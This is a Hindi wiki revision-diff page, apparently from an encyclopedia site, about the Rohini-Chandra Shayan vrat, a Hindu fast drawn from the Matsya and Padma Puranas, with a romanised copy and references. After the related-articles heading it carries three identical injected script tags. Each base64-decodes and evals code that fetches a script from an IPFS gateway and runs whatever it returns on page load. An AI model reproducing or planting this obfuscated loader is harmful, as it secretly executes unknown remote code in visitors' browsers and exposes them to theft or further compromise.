Difference between revisions of "रोहिणीचन्द्र शयन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "पृथक " to "पृथक् ")
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[मत्स्य पुराण]]<ref>मत्स्य पुराण (57) (श्लोक 1-28);</ref> ने इसका विस्तृत वर्णन किया है।   
 
*[[मत्स्य पुराण]]<ref>मत्स्य पुराण (57) (श्लोक 1-28);</ref> ने इसका विस्तृत वर्णन किया है।   
*[[पद्म पुराण]]<ref>पद्मपुराण (4|24|101-130)</ref> में भी ये श्लोक पाये जाते हैं।
+
*[[पद्म पुराण]]<ref>पद्मपुराण (4|24|101-130</ref> में भी ये श्लोक पाये जाते हैं।
 
*यहाँ पर चन्द्र नाम के अंतर्गत [[विष्णु]] की पूजा की जाती है।
 
*यहाँ पर चन्द्र नाम के अंतर्गत [[विष्णु]] की पूजा की जाती है।
*जब [[पूर्णिमा]] पर [[सोमवार]] हो या पूर्णिमा पर [[रोहिणी नक्षत्र]] हो तो पंचगव्य एवं सरसों से स्नान करना चाहिए तथा 'आपायस्व'<ref>([[ऋग्वेद]] 1|191|16, सोम को सम्बोधित)</ref> मंत्र को 108 बार कहना चाहिए तथा एक शूद्र केवल 'सोम को प्रणाम, विष्णु को प्रणाम कहता है।
+
*जब [[पूर्णिमा]] पर [[सोमवार]] हो या पूर्णिमा पर [[रोहिणी नक्षत्र]] हो तो पंचगव्य एवं सरसों से स्नान करना चाहिए तथा 'आपायस्व'<ref>[[ऋग्वेद]] 1|191|16, सोम को सम्बोधित</ref> मंत्र को 108 बार कहना चाहिए तथा एक शूद्र केवल 'सोम को प्रणाम, विष्णु को प्रणाम कहता है।
 
*पुष्पों एवं फलों से विष्णु की पूजा, सोम के नामों का वाचन तथा रोहिणी (सोम की प्रिय पत्नी) को सम्बोधन।
 
*पुष्पों एवं फलों से विष्णु की पूजा, सोम के नामों का वाचन तथा रोहिणी (सोम की प्रिय पत्नी) को सम्बोधन।
 
*कर्ता को गौमूत्र पीना चाहिए, भोजन करना चाहिए, किन्तु मांस नहीं खाना चाहिए।
 
*कर्ता को गौमूत्र पीना चाहिए, भोजन करना चाहिए, किन्तु मांस नहीं खाना चाहिए।
Line 9: Line 9:
 
*यह व्रत एक वर्ष तक करना चाहिए।
 
*यह व्रत एक वर्ष तक करना चाहिए।
 
*अन्त में एक पलंग, रोहिणी तथा चन्द्र की स्वर्णिम प्रतिमाओं का दान करना चाहिए।
 
*अन्त में एक पलंग, रोहिणी तथा चन्द्र की स्वर्णिम प्रतिमाओं का दान करना चाहिए।
*ऐसी प्रार्थना करनी चाहिए –हे कृष्ण, जिस प्रकार रोहिणी, तुम्हें, जो कि सोम हो, त्याग कर नहीं भागती है इसी प्रकार से मैं भी धन से पृथक न किया जाऊँ'; इससे रूप, स्वास्थ्य, दीर्घायु एवं चन्द्रलोक की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रतकाण्ड, 378-382, मत्स्यपुराण से उद्धरण); हेमाद्रि (व्रतखण्ड 2, 175-179, पद्मपुराण 5|24|101-130 से वे ही श्लोक);</ref>  
+
*ऐसी प्रार्थना करनी चाहिए –हे कृष्ण, जिस प्रकार रोहिणी, तुम्हें, जो कि सोम हो, त्याग कर नहीं भागती है इसी प्रकार से मैं भी धन से पृथक् न किया जाऊँ'; इससे रूप, स्वास्थ्य, दीर्घायु एवं चन्द्रलोक की प्राप्ति होती है।<ref>कृत्यकल्पतरु (व्रतकाण्ड, 378-382, मत्स्यपुराण से उद्धरण); हेमाद्रि (व्रतखण्ड 2, 175-179, पद्मपुराण 5|24|101-130 से वे ही श्लोक);</ref>  
 
*कृत्यकल्पतरु (व्रत) एवं हेमाद्रि (व्रत) ने इसे चन्द्ररोहिणीशयन कहा है।  
 
*कृत्यकल्पतरु (व्रत) एवं हेमाद्रि (व्रत) ने इसे चन्द्ररोहिणीशयन कहा है।  
*भविष्योत्तरपुराण<ref>भविष्योत्तरपुराण (206|1-30)</ref> ने भी इसे मत्स्य पुराण की भाँति ही उल्लिखित किया है।  
+
*भविष्योत्तरपुराण<ref>भविष्योत्तरपुराण (206|1-30</ref> ने भी इसे मत्स्य पुराण की भाँति ही उल्लिखित किया है।  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:26, 1 August 2017

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • matsy puran[1] ne isaka vistrit varnan kiya hai.
  • padm puran[2] mean bhi ye shlok paye jate haian.
  • yahaan par chandr nam ke aantargat vishnu ki pooja ki jati hai.
  • jab poornima par somavar ho ya poornima par rohini nakshatr ho to panchagavy evan sarasoan se snan karana chahie tatha 'apayasv'[3] mantr ko 108 bar kahana chahie tatha ek shoodr keval 'som ko pranam, vishnu ko pranam kahata hai.
  • pushpoan evan phaloan se vishnu ki pooja, som ke namoan ka vachan tatha rohini (som ki priy patni) ko sambodhan.
  • karta ko gaumootr pina chahie, bhojan karana chahie, kintu maans nahian khana chahie.
  • keval 28 kaur hi khane chahie aur chandr ko vibhinn pushp arpit karane chahie.
  • yah vrat ek varsh tak karana chahie.
  • ant mean ek palang, rohini tatha chandr ki svarnim pratimaoan ka dan karana chahie.
  • aisi prarthana karani chahie –he krishna, jis prakar rohini, tumhean, jo ki som ho, tyag kar nahian bhagati hai isi prakar se maian bhi dhan se prithakh n kiya jaooan'; isase roop, svasthy, dirghayu evan chandralok ki prapti hoti hai.[4]
  • krityakalpataru (vrat) evan hemadri (vrat) ne ise chandrarohinishayan kaha hai.
  • bhavishyottarapuran[5] ne bhi ise matsy puran ki bhaanti hi ullikhit kiya hai.


tika tippani aur sandarbh

  1. matsy puran (57) (shlok 1-28);
  2. padmapuran (4|24|101-130
  3. rrigved 1|191|16, som ko sambodhit
  4. krityakalpataru (vratakand, 378-382, matsyapuran se uddharan); hemadri (vratakhand 2, 175-179, padmapuran 5|24|101-130 se ve hi shlok);
  5. bhavishyottarapuran (206|1-30

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>